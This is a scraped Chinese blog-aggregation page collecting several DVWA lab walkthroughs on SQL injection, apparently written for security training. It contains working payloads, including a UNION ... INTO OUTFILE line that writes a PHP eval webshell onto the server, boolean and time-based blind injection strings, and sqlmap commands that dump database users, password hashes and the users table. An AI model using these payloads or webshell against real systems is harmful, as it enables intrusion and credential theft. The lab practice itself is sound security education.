精华内容
下载资源
问答
  • sql注入dvwa

    2021-03-07 10:39:06
    SQL injection %28 ( %29 ) %2c , %23 # 写一句话木马 ?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# ...

    SQL injection

    %28  (
    %29   )
    %2c   ,
    %23   #   
    

    写一句话木马

    ?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 
    

    关于mysql注释的用法 (dvwa是mysql,post方式)

    • low
    1' or '1' ='1 //信息最多,其他注入都是一个相同的结果,所以判断是字符型
    
    • medium

    没有输入的地方,只有选择

    抓包修改即可

    • high

    博客园

    自动化注入失效

    sqlmap.py sqlmap -u "http://www.secexercise.tk/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "uuid=uid15204271354091678690121028269; PHPSESSID=rsv9ga280c8gpn6oheb5vhd8p3; security=low"
    

    查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。

    sqlmap.py sqlmap -u "http://www.secexercise.tk/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "uuid=uid15204271354091678690121028269; PHPSESSID=rsv9ga280c8gpn6oheb5vhd8p3; security=low" --second-order "指定返回的页面"
    

    盲注(对和不对两种状态)

    • low

      布尔

    1. 判断类型
    1  //exisits
    1 and 1=1 # //exists
    1' and 1=2 # //missing 返回页面为假,说明后面的成功注入,字符型
    
    1. 判断数据库名

      2.1 先判断长度

      1' and length(database())=1#   //missing
      1' and legth(database())=4 #   //exists
      

      2.2

      1' and ascii(substr(database(),1,1))>97#        a-z(十进制97-122)
      1' and ascii(substr(database(),1,1))<122#
      1' and ascii(substr(database(),1,1))>109#
      1' and ascii(substr(database(),1,1))<103# //exits
      1' and ascii(substr(database(),1,1))<100#  //missing
      1' and ascii(substr(database(),1,1))>100# //missing
      得到首字母askii 为100,d
      
    2. 猜解表名

      3.1 猜解表的数量

      1' and (select count(table_name) from information_tables where table_schema=database())=1
      

      3.2挨个猜解表名

      1' and length((substr(select table_name from information_schema.tables where table_schema =database() limit 0,1),1))=1#
      
      
      1' and ascii(substr(select table_name from information_scema.tables where table_schema=database() limit 0,1),1,1)>97#
      
       ### 时间
      
      1' and sleep(5)#  //感觉明显延迟
      1 and sleep(5)# 无延迟
      

      2

      1' and if(length(database())=1,sleep(5),1)
      

    自动化注入:

    sqlmap.py -u "url"  -p "id" --cookie "cookiexxx"  -D dvwa -T users -C "user,password" -dump 
    

    博客园文章

    展开全文
  • sql注入 dvwa 盲注

    2020-01-07 22:23:30
    1' and sleep(10) -- - 1' and if(length(database())=4,1,1=2) -- - 1' and if((ascii(substr(database(),1,1)))=100,1,2=1) -- - 1 and sleep(10) -- - 抓包 1 and if(length(database())=4,1,1=2) ...

    1' and sleep(10) -- -
    1' and if(length(database())=4,1,1=2) -- -
    1' and if((ascii(substr(database(),1,1)))=100,1,2=1) -- -

    1 and sleep(10) -- -
    抓包
    1 and if(length(database())=4,1,1=2) 
    1 and if((ascii(substr(database(),1,1)))=100,1,2=1) 

    1' and sleep(10) -- -
    1' and if(length(database())=4,1,1=2) -- -
    1' and if((ascii(substr(database(),1,1)))=100,1=1,2=1) -- -

    展开全文
  • 手把手带你飞,在DVWA靶机上练习sql注入

    本文共有772字和12张插图,读完大约需要5分钟。

    1 简介

    本文作为一个实验,练习一下sql注入。
    本文共有670个字、12张图片,读完大约需要3分钟。

    2 本文环境

    一台CentOS7 32位 虚拟机,一台Kali 2020.1b 32位 虚拟机。CentOS上安装LNMP环境、DVWA,Kali虚拟机系统本身带有sqlmap。

    3 登录DVWA

    在Kali的浏览器上访问搭建好的dvwa,登录admin用户之后点DVWA Security,在下拉框中选Low,点Submit,在这里插入图片描述
    点SQL Injection,点Submit
    在这里插入图片描述
    复制浏览器地址栏的URL
    在这里插入图片描述

    4 打开sqlmap

    在Kali里打开Sqlmap,输入如下命令,

    sqlmap -u "http://192.168.1.128/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=blb32d0eb5arnt0r80eloeblb1" --batch 
    

    检测到对方的DBM为5.5以上版本:
    在这里插入图片描述

    5 sql注入命令

    5.1 获取所有数据库名

    输入如下命令:

    sqlmap  -u  “URL”   --cookie  “   ”  --batch  --dbs   //注入数据库
    

    检测到对方的数据库名称
    在这里插入图片描述

    5.2 获取某数据库中的所有表名

    输入如下命令:

     sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  --tables 
    

    获取到数据库名为dvwa中的表名:
    在这里插入图片描述

    5.3 获取到数据库管理系统的用户名和密码

    输入如下命令:

    sqlmap  -u  “URL”   --cookie  “   ”  --batch   --users  --passwords
    

    获取到数据库管理系统的用户名和密码:
    在这里插入图片描述

    5.4 获取到某数据库中某表中的两列数据

    输入如下命令

     sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  -T users  -C  “user,password”  --dump 
    

    获取到名为dvwa的数据库中表名为users中的用户名和密码
    在这里插入图片描述

    5.5 获取到数据库中所有的表名

    输入如下命令

    sqlmap  -u  “URL”  --tables   //猜表名
    

    获取到数据库中所有的表名:
    在这里插入图片描述
    输入如下命令

    sqlmap  -u  “URL”  --columns  -T   //猜解列名
    

    测试不成功,获取失败:
    在这里插入图片描述

    5.6 爆出某表中某列数据

    输入如下命令

    sqlmap  -u  “URL”  --dump  -C  “列名”  -T  “表名”   //爆出字段数据
    

    测试不成功,获取失败:
    在这里插入图片描述

    6 附录

    --dbs  //所有数据库
    --tables //所有表
    --columns //所有列
    --users  //用户名
    ---count  //统计条数
    --level   //测试等级 (1-5) 默认1  cookie  2   http 头3 
    
    展开全文
  • sql注入dvwa(low)

    2019-09-02 19:22:25
    靶机:dvwa bug:SQL Injection 难度等级:low ** 分析 ** 在输入框中分别输入“1”、“1’ and 1=1#”,“1’ and 1=1#”三条命令。发现第一条和第二条能执行成功,第三条不能执行成功,这说明这个地方存在注入点。...

    靶机:dvwa
    bug:SQL Injection
    难度等级:low

    **

    分析

    **
    在输入框中分别输入“1”、“1’ and 1=1#”,“1’ and 1=1#”三条命令。发现第一条和第二条能执行成功,第三条不能执行成功,这说明这个地方存在注入点。(直接上sqlmap试试)
    第一条命令
    第二条命令
    第三条命令

    sqlmap爆破

    1. 利用burpsuite抓取数据包,获取requests的header,存入txt文本中。
      获取header
    2. 打开sqlmap,使用“-r”参数,后面直接跟上上一步得到的header。“–dbs”参数是爆破数据库。
      执行sqlmap

    爆破出数据库

    1. 爆破表名,使用参数“–tables”。爆破时需要指出数据库。
      爆破表名

    2. 爆破表的列名,使用参数“–columns”,爆破时需指出表的名称。
      在这里插入图片描述
      在这里插入图片描述

    3. 爆破列的内容,使用参数“–dump”,此时需要指定需要爆破列的名称。
      在这里插入图片描述
      在这里插入图片描述

    展开全文
  • sql注入dvwa和bwapp实战

    2019-10-18 23:00:53
    一、dvwa sql注入实战 级别low 1、猜列 一开始输入1 7发现找不到最终1 2 1‘ union select 1,2# 成功,有两列 查看版本 1’union select database(),version()# 1’ union select 1,concat(@@datadir,...
  • SQL实战post注入DVWA

    2020-05-20 19:09:21
    1.首先搭建好自己本地的DVWA,进入DVWA...5.改了之后重新进入DVWA将安全等级设为low,进入SQL injection页面输入1回车 6.返回burpsuite查看是否抓到了 抓取数据包成功 7.将抓取到的数据包复制为TXT文件 我命名为1.txt
  • (1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入...(3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
  • SQL注入DVWA演示)

    2019-08-05 14:28:12
    SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 实验代码: 1’and’ 1’=‘2 1’ or ‘1’ =‘1 1’ or ‘1234’=‘1234 1’ ...
  • SQL注入(dvwa环境)

    2018-03-05 00:07:00
    2、进入SQL Injection页面,出错了。(心里想着这DVWA是官网下的不至于玩不了吧。。) 网页错误提示:Parse error: syntax error, unexpected '['inC:\xampp\htdocs\DVWA\vulnerabilities\s...
  • DVWA渗透环境下SQL注入 dvwa是一个randomstorm的开源项目,用来供给新手学习渗透测试的一个环境,里面共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File ...
  • sql注入(dvwa)

    2019-01-22 21:50:29
    1' and ord(mid((select ifnull(cast(user as char),0x20) from dvwa.users order by 'user' limit 0,1),1,1))=97 and '1'='1  3 error based 3.1 floor 获得数据库版本: 1' and(select 1 from...
  • DVWA SQL注入

    2021-03-11 16:39:34
    DVWA SQL注入 安装及下载 dvwa、 插件等 请看上一篇文章 1.首先修改 low 2.SQL注入打开proxy switcher,如此修改 3. 打开Burp页面,关闭intercept 4.清除HTTP历史 输入ID,查看记录 SQL注入 列出所有的库 ...
  • 今天主要针对mysql常用注入语句进行测试。 测试环境与工具: 测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。 渗透工具:burpsuite-...
  • sql注入——DVWA(low)

    2019-06-01 17:27:11
    先来说一下sql注入的原理; 假设一下,我们在登陆的时候会提交用户名和密码;而这个密码是存在数据库里的;这就说明了web application已经为我们准备好了查询数据库的语句;先假设是 select * f...
  • 简单的SQL注入 -- dvwa

    2021-03-22 17:32:30
    简单的SQL注入dvwadvwa的 low-level为例 文章目录简单的SQL注入 -- dvwa布尔注入Injection CodeResult联合注入1.确定字段数Injection CodeResult (错误信息)Result (正确信息)2. 找到数据库名称Injection ...
  • SQL注入原理及DVWA实战

    2020-10-31 01:15:09
    SQL注入原理及DVWA实战一、SQL注入原理二、测试实例三、DVWA实战 一、SQL注入原理 要理解SQL注入的原理,就必须了解能够对数据库中的信息进行增删改查的SQL语言。Sql 注入攻击就是通过将恶意的 Sql 查询或添加语句...
  • 1 使用sqlmap注入DVWASQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息。 得到的cookie信息...
  • dvwa sql注入

    2020-07-18 14:26:07
    dvwa sql注入 low 一、判断sql是数字型注入还是字符型注入 1.输入1 2.输入1’和1’# 输入1’ 报错 输入1’# 不报错 此处判断User ID是字符型的,在sql语句中有 ’ ’ 包裹。 3.检验是否可注入,输入1’ or 1=1# ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,257
精华内容 502
关键字:

sql注入dvwa